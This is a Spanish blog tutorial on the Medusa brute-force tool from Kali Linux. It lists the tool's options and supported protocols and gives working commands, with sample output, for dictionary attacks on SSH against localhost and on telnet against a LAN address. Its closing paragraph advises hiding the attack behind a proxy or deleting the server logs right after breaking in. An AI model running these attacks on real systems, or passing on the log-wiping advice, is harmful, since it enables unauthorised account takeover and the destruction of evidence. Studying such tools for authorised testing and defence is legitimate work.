Kali Linux > Password Attacks > Online Atacks - Medusa

Medusa es una herramienta permite hacer ataques de fuerza bruta contra un variado conjunto de protocolos, vamos a ver como funciona:

Si ejecutamos medusa con la opción -d podremos ver el conjunto de módulos disponibles:


Las opciones interesantes para lanzar un ataque de fuerza bruta son:
  • [-h host|-H file]: Mediante -h especificamos un determinado host, mientras que con -H indicamos un fichero dónde encontrar un listado de hosts a atacar
  • [-u username|-U file]: Mediante -u indicamos un usuario y el complementario -U indicamos un diccionario con usuarios
  • [-p password|-P file]: Mediante -p indicamos una contraseña a probar, mientras que con -P indicamos un diccionario de contraseñas
  • -M module: Con -M indicamos un módulo de los disponibles para el protocolo que nos interese

Con medusa puedes crackear por diccionario de una manera muy rápida los siguientes servicios:

AFP
CVS
FTP
HTTP
IMAP
MS-SQL
MySQL
NetWare NCP
NNTP
PcAnywhere
POP3
PostgreSQL
REXEC
RLOGIN
RSH
SMBNT
SMTP-AUTH
SMTP-VRFY
SNMP
SSHv2
Subversion (SVN)
Telnet
VMware autenticación Daemon (vmauthd)
VNC
Genérico Wrapper
Web Form

Sintaxis

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

 
Por ejemplo, para hacer un ataque de fuerza bruta al propio servidor con el usuario admin y un diccionario de contraseñas llamado pass.txt:

#root@kepler:~# medusa -h 127.0.0.1 -u admin -P pass.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks 

ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 1 complete) User: ejemplo (1 of 1, 1 complete) Password: ejemplo (1 of 4 complete)
ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 1 complete) User: ejemplo (1 of 1, 1 complete) Password: lol (2 of 4 complete)
ACCOUNT CHECK: [ssh] Host: 127.0.0.1 (1 of 1, 1 complete) User: ejemplo (1 of 1, 1 complete) Password: hola (3 of 4 complete)
ACCOUNT FOUND: [ssh] Host: 127.0.0.1 User: admin Password: hola* [SUCCESS]
 
 
Ataque de fuerza bruta al propio servidor con el usuario ejemplo y un diccionario de contraseñas llamado passfile servicio ssh

#medusa -h 127.0.0.1 -u ejemplo -P passfile -M ssh

En este caso vamos a realizar el ataque a un equipo corriendo telnet y conocemos que el usuario es admin:

#medusa -h 192.168.1.1 -u admin -P claves.txt -M telnet -f -b -v 6 -e ns


Cuando nos encontramos un servidor “vulnerable” a un ataque de fuerza bruta con diccionario, debemos tener mucho cuidado, ya que un ataque de esta naturaleza hace demasiado “RUIDO” es decir, todos los intentos de conexión quedaran guardados en los logs del servidor, por eso es pertinente usar un proxy para hacer el ataque, o en su defecto borrar los logs, inmediatamente después de entrar al servidor.


Manuales de Hydra y Medusa

Para que ste blog siga creciendo:


Visitenos en:

Instagram